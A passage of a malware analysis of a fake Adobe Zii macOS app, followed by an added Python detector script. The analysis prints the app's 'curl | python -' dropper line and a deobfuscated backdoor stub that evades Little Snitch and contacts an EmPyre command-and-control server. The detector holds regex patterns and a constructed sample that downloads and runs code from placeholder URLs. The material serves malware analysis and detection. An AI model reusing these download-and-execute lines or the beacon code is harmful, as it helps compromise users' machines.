Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

```
curl | python -
```

This script is designed to download and execute a Python script, then download and run an app named sample.app. That app appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually "legitimate." (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

```python
import sys
import re, subprocess
import urllib2

# Look for a running Little Snitch process
cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)

# Build the request to the command-and-control server
UA='Mozilla/5.0 (Windows NT 6.1 WOW64 Trident/7.0 rv:11.0) like Gecko'
server=''
t='/news.php'
req=urllib2.Request(server+t)
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=")
```

The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor's network connection to the attention of the user. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have already blocked the connection that would have attempted to download this script, so checking at this point is worthless.) Otherwise, the script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the infected Mac.
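As an added example (not code from the original post or from the malware), the following Python 3 script inspects an Automator app's workflow plist for "Run Shell Script" actions that pipe a download straight into an interpreter or make a downloaded file executable, the two behaviours seen in the fake Adobe Zii app above. It assumes Automator's `document.wflow` layout (an `actions` list whose entries carry an `action` dict with `ActionParameters` and `COMMAND_STRING`); the sample workflows are constructed inline with placeholder URLs.

```python
"""Scan an Automator workflow plist (Contents/document.wflow) for
"Run Shell Script" actions that download and execute code, the pattern
the fake Adobe Zii app used (curl ... | python -). Assumed plist layout:
top-level 'actions' list, each item an 'action' dict whose
'ActionParameters' holds the script under 'COMMAND_STRING'."""
import plistlib
import re

# A downloader piped straight into an interpreter ...
PIPE_TO_INTERPRETER = re.compile(
    r"\b(curl|wget)\b[^|;&\n]*\|\s*(python[23]?|perl|ruby|sh|bash|zsh)\b")
# ... or a downloaded file made executable (and presumably run).
DOWNLOAD_THEN_EXEC = re.compile(
    r"\b(curl|wget)\b[^\n]*>\s*\S+[^\n]*chmod\s+\+x")

def shell_commands(wflow_bytes):
    """Yield the shell command of every action in a document.wflow plist."""
    doc = plistlib.loads(wflow_bytes)
    for entry in doc.get("actions", []):
        params = entry.get("action", {}).get("ActionParameters", {})
        cmd = params.get("COMMAND_STRING")
        if cmd:
            yield cmd

def suspicious_commands(wflow_bytes):
    """Return the commands that match a download-and-execute pattern."""
    return [c for c in shell_commands(wflow_bytes)
            if PIPE_TO_INTERPRETER.search(c) or DOWNLOAD_THEN_EXEC.search(c)]

def make_wflow(command):
    """Build a minimal document.wflow plist with one Run Shell Script action."""
    return plistlib.dumps({"actions": [{"action": {
        "ActionParameters": {"COMMAND_STRING": command}}}]})

# Constructed samples (URLs are placeholders, not the real ones).
MALICIOUS_WFLOW = make_wflow(
    "curl http://PLACEHOLDER/script | python - &\n"
    "curl http://PLACEHOLDER/sample > sample.app; chmod +x sample.app; ./sample.app")
BENIGN_WFLOW = make_wflow('echo "$@" | wc -c')

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_WFLOW), ("benign", BENIGN_WFLOW)):
        print(name, suspicious_commands(blob))
```

Run it against a suspect app with `python3 scan.py` after replacing the constructed samples with `open("Fake.app/Contents/document.wflow", "rb").read()`.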